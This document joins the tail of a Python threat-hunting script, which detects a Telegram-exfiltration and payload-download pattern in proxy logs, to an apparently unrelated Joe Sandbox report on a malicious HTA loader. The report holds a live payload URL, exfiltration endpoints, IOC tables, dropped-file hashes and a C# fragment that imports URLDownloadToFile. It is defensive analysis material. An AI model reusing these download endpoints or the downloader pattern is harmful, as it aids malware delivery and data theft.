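2025-03-17T00:18:09 10.0.0.12 POST https://api.telegram.org/botREDACTED/sendDocument?chat_id=REDACTED
2025-03-17T00:18:10 10.0.0.55 GET https://reallyfreegeoip.org/xml/203.0.113.7
2025-03-17T00:19:00 10.0.0.77 GET http://23.95.235.28/120/csoss.exe
2025-03-17T00:40:00 10.0.0.55 GET http://checkip.dyndns.com/
2025-03-17T00:41:00 10.0.0.55 POST https://api.telegram.org/botREDACTED/sendMessage
"""


def classify(url: str) -> str | None:
    """Map a URL to a stage of the pattern, or None if it is unrelated."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in PAYLOAD_HOSTS:
        return "payload"
    if host in RECON_HOSTS:
        return "recon"
    if host in GEOIP_HOSTS and parts.path.startswith("/xml/"):
        return "geoip"
    if host == "api.telegram.org" and TELEGRAM_PATH.match(parts.path):
        return "exfil"
    return None


def parse_line(line: str) -> tuple[datetime, str, str]:
    """Split one assumed-format log line into (timestamp, client ip, url)."""
    ts, src, _method, url = line.split(maxsplit=3)
    return datetime.fromisoformat(ts), src, url


def hunt(log_text: str) -> dict[str, list[str]]:
    """Return {client_ip: sorted stages} for clients that contacted the payload
    host, or that showed recon, geoip and exfil within WINDOW of each other."""
    events: dict[str, list[tuple[datetime, str]]] = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, url = parse_line(line)
        stage = classify(url)
        if stage:
            events[src].append((ts, stage))

    hits: dict[str, list[str]] = {}
    for src, evs in events.items():
        evs.sort()
        stages_all = {s for _, s in evs}
        if "payload" in stages_all:           # direct IOC match, no sequencing needed
            hits[src] = sorted(stages_all)
            continue
        for i, (t0, _) in enumerate(evs):     # slide a WINDOW forward from each event
            in_window = {s for t, s in evs[i:] if t - t0 <= WINDOW}
            if REQUIRED <= in_window:
                hits[src] = sorted(in_window)
                break
    return hits


if __name__ == "__main__":
    for src, stages in hunt(SAMPLE_PROXY_LOG).items():
        print(f"{src}: {', '.join(stages)}")
```

Client 10.0.0.55 touches all three services but spread over more than ten minutes, so it is not reported; 10.0.0.12 completes the sequence in eight seconds and 10.0.0.77 hits the payload host directly. The recon and geoip services are legitimate, so the sequence and window do the work; the payload host is the only indicator worth matching on its own.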
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1640151
Start date and time: 2025-03-17 01:17:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: needagoodplanforsuccesstogetbackbest.hta
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 58
• Number of non-executed functions: 269
Cookbook Comments:
• Found application associated with file extension: .hta
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 23.60.203.209, 4.175.87.197
• Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryAttributesFile calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data
Time | Type | Description
--- | --- | ---
20:19:00 | API Interceptor | 39x Sleep call for process: powershell.exe modified
IPs

Match: 104.21.48.1

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
345623.bat | malicious | DBatLoader, FormBook | www.shlomi.app/9rzh/
ySUB97Jq80.exe | malicious | FormBook, GuLoader | www.shlomi.app/9rzh/
hQaXUS5gt0.exe | malicious | FormBook | www.newanthoperso.shop/3nis/
6nA8ZygZLP.exe | malicious | FormBook | www.rbopisalive.cyou/2dxw/
UhuGtHUgHf.exe | malicious | FormBook | www.enoughmoney.online/z9gb/
Bill_of_Lading_20250307_pdf.bat.exe | malicious | Lokibot | touxzw.ir/sccc/five/fre.php
Stormwater Works Drawings Spec.js | malicious | FormBook | www.lucynoel6465.shop/jgkl/
Shipment Delivery No DE0093002-PDF.exe | malicious | Lokibot | touxzw.ir/tking3/five/fre.php
Remittance_CT022024.exe | malicious | Lokibot | touxzw.ir/fix/five/fre.php
http://microsoft-sharepoint4543464633.pages.dev/index-2jc93/ | malicious | HTMLPhisher | microsoft-sharepoint4543464633.pages.dev/index-2jc93/

Match: 23.95.235.28

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
APC2_240708172813545null_847608629.xls | malicious | Unknown | 23.95.235.28/xampp/rmo/rmn/needagoodplanforsuccesstogetbackbest.hta
APC2_240708172813545null_847608629.xls | malicious | Unknown | 23.95.235.28/xampp/rmo/rmn/needagoodplanforsuccesstogetbackbest.hta
FORMULARZ ODPRAWY CELNEJ DHL.xls | malicious | Unknown | 23.95.235.28/xampp/rmo/needagoodplanforsuccesstogetbackbest.hta
efs.hta | malicious | Cobalt Strike, MSIL Logger, MassLogger RAT | 23.95.235.28/60/csso.exe
dok PZ 2025-03-11_142242 fin_Orygina#U0142.xls | malicious | Unknown | 23.95.235.28/xampp/rsc/rc/efs.hta
dok PZ 2025-03-11_142242 fin_Orygina#U0142.xls | malicious | Unknown | 23.95.235.28/xampp/rsc/rc/efs.hta
uhg.hta | malicious | Cobalt Strike, MSIL Logger, MassLogger RAT | 23.95.235.28/50/csso.exe
Neue Bestellung 236904.xls | malicious | Unknown | 23.95.235.28/xampp/rsc/uhg.hta
Neue Bestellung 236904.xls | malicious | Unknown | 23.95.235.28/xampp/rsc/uhg.hta
Bozza nuovo ordine 0010979742.xls | malicious | Unknown | 23.95.235.28/xampp/ugccs/yougetgoodthingswithbestadvantageforthis.hta
Domains

Match: checkip.dyndns.com

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.8.169
iCgb4kAWFh.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.247.73
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
SOA OF FEB 2025 PT.BINEX.exe | malicious | MSIL Logger, MassLogger RAT | 158.101.44.242
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 132.226.247.73
Ogdu1MivyN.exe | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 132.226.8.169
FVWbiG8vBc.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.130.0
TOP20250252.exe | malicious | Snake Keylogger | 158.101.44.242
QUOTATION_MARQUOTE312025PDF.scr.exe | malicious | MSIL Logger | 132.226.247.73

Match: reallyfreegeoip.org

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.32.1
iCgb4kAWFh.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.16.1
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.64.1
SOA OF FEB 2025 PT.BINEX.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.64.1
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.80.1
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.64.1
Ogdu1MivyN.exe | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 104.21.64.1
FVWbiG8vBc.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.112.1
TOP20250252.exe | malicious | Snake Keylogger | 104.21.80.1
QUOTATION_MARQUOTE312025PDF.scr.exe | malicious | MSIL Logger | 104.21.16.1
ASNs

Match: CLOUDFLARENET, US

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
JITZq92T28.exe | malicious | Unknown | 172.64.41.3
12Kp1xbcjv.exe | malicious | Unknown | 104.21.32.1
JITZq92T28.exe | malicious | Unknown | 172.64.41.3
41QUE01 - TAX INVOICE - 7274916 from SFG (Brisbane).html | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 172.67.70.233
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.32.1
https://apply.atu.ie/_entity/sharepointdocumentlocation/a10f35db-a302-f011-bae2-7c1e524f2423/903e00e6-7542-ee11-bdf3-6045bd8c56d2?file=CONFIDENTIALDoc_Au89994.pdf | malicious | HTMLPhisher, Invisible JS, Tycoon2FA | 188.114.96.3
jbJFtxTmyS.exe | malicious | AsyncRAT, XWorm | 172.67.72.57
iCgb4kAWFh.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.16.1
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.64.1
SOA OF FEB 2025 PT.BINEX.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.64.1

Match: AS-COLOCROSSING, US

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
verynicegirlgivenmebestwordforgreatnesswithgoodthings.hta | malicious | Unknown | 192.3.95.138
Build.exe | malicious | StormKitty | 23.94.126.116
h2wb5_002.exe | malicious | DarkVision Rat | 104.168.28.10
dBKUxeI.exe | malicious | AsyncRAT, DarkVision Rat | 104.168.28.10
random.exe | malicious | Amadey, LummaC Stealer, Stealc, Xmrig | 107.174.192.179
earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta | malicious | Remcos | 172.245.191.88
goodmanwnatgoodthingsforbesthings.hta | malicious | Cobalt Strike, MSIL Logger, MassLogger RAT | 192.3.101.146
Our Order.xls | malicious | Unknown | 198.12.89.24
ienetstatgoodforkissing.hta | malicious | Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 192.227.228.22
Proof of Payment and Statement.xls | malicious | Unknown | 192.227.228.22

Match: ORACLE-BMC-31898, US

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
SOA OF FEB 2025 PT.BINEX.exe | malicious | MSIL Logger, MassLogger RAT | 158.101.44.242
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.6.168
FVWbiG8vBc.exe | malicious | MSIL Logger, MassLogger RAT | 193.122.130.0
TOP20250252.exe | malicious | Snake Keylogger | 158.101.44.242
DHL Shipping Details Ref ID 4466331798008765975594-pdf.exe | malicious | MSIL Logger, MassLogger RAT | 158.101.44.242
ienetstatgoodforkissing.hta | malicious | Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 193.122.6.168
7495 P.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
SOA FEB 2025.exe | malicious | MSIL Logger, MassLogger RAT | 158.101.44.242
13.03.2025-13.03.2025 shtml.exe | malicious | MSIL Logger, MassLogger RAT | 158.101.44.242
JA3 Fingerprints

Match: 54328bd36c14bd82ddaa0c04b25ed9ad

Associated Sample Name / URL | Detection | Threat Name | Context
--- | --- | --- | ---
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.48.1
iCgb4kAWFh.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.48.1
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.48.1
SOA OF FEB 2025 PT.BINEX.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.48.1
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.48.1
CloudServices.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.48.1
Ogdu1MivyN.exe | malicious | DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer | 104.21.48.1
FVWbiG8vBc.exe | malicious | MSIL Logger, MassLogger RAT | 104.21.48.1
Extreme Injector v3.exe | malicious | XWorm | 104.21.48.1
shit.exe.bin.exe | malicious | Unknown | 104.21.48.1
                                                                                  No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 980992
Entropy (8bit): 6.875555651887693
Encrypted: false
SSDEEP: 24576:/u6J33O0c+JY5UZ+XC0kGso6Fa4aL34eprdWY:Ju0c++OCvkGs9Fa4aL341Y
MD5: 54DE0C8E192E7BC71B6D284FFF136296
SHA1: F2AB671CBF4229C9C7EA12F01B148E470B6621E7
SHA-256: D274A8FCA173BF675C950AAD9A3D09EF48DCE2522756BC6BEBA0E08DB8DCFC90
SHA-512: 5EE16D7EB2ED2B7CF85225ACC2FDB43144581CA54BB171FE129B5F2ABF5E067D1BFE9472616714BB869C7AC3765CCF22873F56F116BBFA6F1CEE37863D35F258
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Reputation:low
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...y..g.........."..................}............@..........................`............@...@.......@.....................L...|....p...o.......................q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc....o...p...p..................@..@.reloc...q.......r..................@..B........................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1328
                                                                                  Entropy (8bit):5.405945905705216
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:3K1yt4WSKco4KmM6GjKbmOIKo+mN1s4RPQoU99t7J0gt/NK3R8UHrgtq:sy+WSU4Yymp+ms4RIoU99tK8NWR8WP
                                                                                  MD5:B14C2335AAE9A3377664B1241901B608
                                                                                  SHA1:26671759F4E4DF97B4FCBF96A378A3809F685FD1
                                                                                  SHA-256:644A49D980BCA8A3C180B6EEC207B61A82CABA4B9FBB0D6E804D5ED9EB036E1A
                                                                                  SHA-512:ED719AA3C7D26560B1415C824451206F3AF1CDCB3BA4402CD7733209890759B7A2FA3822D53FDC39C899CD65F3ECEF39ABBE8E648282D189B54FFE26F33EAF6E
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (360)
                                                                                  Category:dropped
                                                                                  Size (bytes):479
                                                                                  Entropy (8bit):3.750991504160988
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:V/DsYLDS81zuUedyk0mdOmMGlvQXReKJ8SRHy4H4Qm4m1mvlmOwmQy:V/DTLDfuDdOdXfHa6LQy
                                                                                  MD5:B49F3695D3B07F65D78DF9AA701DCD7B
                                                                                  SHA1:DF0C9DA5C709077F924EF7E102F7DC50D3FA4842
                                                                                  SHA-256:71CFC2436BEB146574A1291ED463156F17EC292807A8F2FFF24CE178387D9B99
                                                                                  SHA-512:E56732AAE2DBAC65F0CEB25E50DB3BDB64D46027EBF3D40A500104DCC1E7BFEC958BED542A44A3BB974422F4AA4EE6D61B8C817DC55B6D62BF33F4B6D60E95EF
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..namespace VGVao.{. public class TGNDoGqCKG. {. [DllImport("urLMon", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr gWQipMDGdr,string jgk,string EizcMHvvBZ,uint r,IntPtr E);.. }..}.
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):375
                                                                                  Entropy (8bit):5.224666411547813
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fE8ssUzxs7+AEszIN723fE8s+x:p37Lvkmb6K2an8WZETan/x
                                                                                  MD5:08093A3BF1DB6BE2914EACF06DEEAFAD
                                                                                  SHA1:4E4D280B642B27038A402BBCA66F55C72A735512
                                                                                  SHA-256:8EAD6F72DEA4498C5FC6CF7271DD1538248DE75C512242EF5AA6A0A5B8893FB2
                                                                                  SHA-512:6F8DF4EC625DBEA9B91D2D75BEC017EACAE1E949CB33F2D0668CF01E528592F2C38983719E97AACF213B7F3DA05D2C8E18E6255EEF1F270E7F45D0E02439128A
                                                                                  Malicious:true
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.0.cs"
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3072
                                                                                  Entropy (8bit):2.820772974529545
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:etGSSPBG5eM7p882uckX/befKsDtkZfgjrqhkWI+ycuZhNQakSsPNnq:6BsM+fa/KfKtJgjrEH1ulQa38q
                                                                                  MD5:1A1F406192C4B1BB085A6715F8BF1619
                                                                                  SHA1:E09A7734C346B5C6C969F562321BB8B78EC6F3FE
                                                                                  SHA-256:16A101E773E5B552FB07BE025375ACEF1011CE3E37E57FC994149DF8860B57C5
                                                                                  SHA-512:D14B9636392975A91E6152C40CA50E7AE474AAE2F8AC334F151EDEE7CD70449892CD5F490C2458BD2F925E4DE6795ACF885013C57CDB582117CF6252B51D2731
                                                                                  Malicious:true
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....{.g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1.....u.....u...........................".............. ?.....P ......Q.........W.....b.....f.....q.....s...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.43
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):876
                                                                                  Entropy (8bit):5.299403899878867
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:KOuqd3ka6K2antETan/UKax5DqBVKVrdFAMBJTH:yika6CtE+/UK2DcVKdBJj
                                                                                  MD5:CA10DB9E0651548E26556156B08E8E02
                                                                                  SHA1:9ABA4D55D81C8F79722AEE86EFC9BAE21805BCCB
                                                                                  SHA-256:7C8F7B8B1BFBC955F76BE8FDD6BF09148A7F536760BCCE22680140C58624985F
                                                                                  SHA-512:52204A18D968461467777E00A589DA09313414F6128B411B97E3E484CBB8101135F4085087942F7343B69D02C79ADE5FDF9D70D2BB8301E27CBF0015F0354B1B
                                                                                  Malicious:false
                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.115537472240626
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryuak7YnqqsPN5Dlq5J:+RI+ycuZhNQakSsPNnqX
                                                                                  MD5:B3F4CCED1657D1D4CD16A8A2A71152C7
                                                                                  SHA1:54BA36E98D75FEFDE9AE49DEB8D76D420D5C2386
                                                                                  SHA-256:CF01B14B11BA08B2828A76C10586A2C4FD56A3B54CD913389F4837AB726AA5CE
                                                                                  SHA-512:7900FD73825DB472F13C28E02CCA90F91812BB19FEFA106AC9760B07B407DC381EF227671F0DFA01DD69D1B2FD2E962BC9C433B5CB2CA374D8961ECFA82106E0
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.3.s.w.u.u.3.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...4.3.s.w.u.u.3.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Mon Mar 17 01:29:47 2025, 1st section name ".debug$S"
                                                                                  Category:dropped
                                                                                  Size (bytes):1340
                                                                                  Entropy (8bit):4.004559335950445
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:HcK9oVa5eqaHMwKcjmfwI+ycuZhNQakSsPNnqSed:WI5efzK2mo1ulQa38qS+
                                                                                  MD5:6127A2DE71F301ED60AD8F7B53BF2071
                                                                                  SHA1:7BBA6478E1B163F74514A2FFCE741A5F30A49878
                                                                                  SHA-256:D4B60FF184FC4E3403EAEC2689143DD946A2B628EF287E5B00A0ADB4D355B86C
                                                                                  SHA-512:97F18A5805D450EBA15B3D01AB84F3F33A4CC399D83CDAF45DECADE767D61B7D6B512154DCB3FDD7A249F05F8CF4CC87AA4479E88877199287C6AEFB38D9ECD5
                                                                                  Malicious:false
                                                                                  Preview:L....{.g.............debug$S........X...................@..B.rsrc$01........X.......<...........@..@.rsrc$02........P...F...............@..@........W....c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP.....................W........R...........7.......C:\Users\user\AppData\Local\Temp\RESC5CF.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...4.3.s.w.u.u.3.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Users\user\AppData\Roaming\csoss.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):93696
                                                                                  Entropy (8bit):6.859595316455185
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:zAXKONfuoQTvK0BKTBI4LmIK8AfXEQzFgHI5t348YDXe/l5BnHdFU+kWj9gukGrR:VafuoQTvK0BKTBI4LmIK8AfXEQzFgHGj
                                                                                  MD5:567A6B0C68A61B680EA2ABE4CD4A4BF6
                                                                                  SHA1:9B5554EBC8363BC7B0247D92BD399314EC2A6325
                                                                                  SHA-256:3D43A21F33A7589FF3C7782307FF77026F1D224E31D84F785A75138ED219C5A7
                                                                                  SHA-512:A5DB55CD1D60BB917DC4761953E41CB0D357554E9351C92A620B335B883B7228E649F446ACD3B29539BB3D280C41533AB9180A4E7BBB84B88AF9E0C8EEFAE40C
                                                                                  Malicious:false
                                                                                  Process:C:\Users\user\AppData\Roaming\csoss.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):63822
                                                                                  Entropy (8bit):7.883912543678241
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:8XvTxKrhtlnl6MtPW+ndY7NJIJ4IfkrhW29cRToe/vhJ8UkAq:8fTx4PllM+dumJ4Iak2Oxo+zE1
                                                                                  MD5:349F224257DECA966977066A62BB7BB8
                                                                                  SHA1:DB850D7B43E1BE751573450A62D570FF26A86593
                                                                                  SHA-256:109E7DB35FFBCD28557C12CEA62AAF5115C73349DA3AED014F6B688BBAADDBD7
                                                                                  SHA-512:B43EB613F70549B0CB96D02FE26E8DCF8F2D772202D86859F55476FDAD9A93DB60862E8A781577B64EE5401F321CF60F89023F01DF1178BB8251623D6797DE92
                                                                                  Malicious:false
                                                                                  File type:HTML document, ASCII text, with very long lines (15809), with CRLF line terminators
                                                                                  Entropy (8bit):2.091728349887329
                                                                                  TrID:
                                                                                  • HyperText Markup Language (15015/1) 100.00%
                                                                                  File name:needagoodplanforsuccesstogetbackbest.hta
                                                                                  File size:15'977 bytes
                                                                                  MD5:151ebe266eb058faf3a2a749fc6c918a
                                                                                  SHA1:6c7e0493b004fb0d48a72a6fd7fac0dd1843daf4
                                                                                  SHA256:ea7cb3e80587b9322c9985ea5318728a0fb4fa9a25304a1f0a944d39b65bfa20
                                                                                  SHA512:666b1a803fc152aac885d3769966c5e9ffbd9962dc4b3fe7b7a7d52fa44038cd5ef470294cd4687cebec7e9c0e976fc489a67efc8fdb8e078ab29cc7ad16da71
                                                                                  SSDEEP:48:3m9xs1IdiYqk9FWs1IdiYqhyMhHHr+v0jj99DdGDyXiEIyttZaCy9D398pJ27s1W:Ebd/8bd/El1fADjEIyIpbd/1
                                                                                  TLSH:5F72B7285C38EC1B5F8AC8A461EC8AE3ED4D533314914FA2B4AC948D97695AC3CC73C6
                                                                                  File Content Preview:<!DOCTYPE html>..<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >..<html>..<body>..<SCRiPT LanguaGE="VBScRIPt">..diM...............................................................................................................................
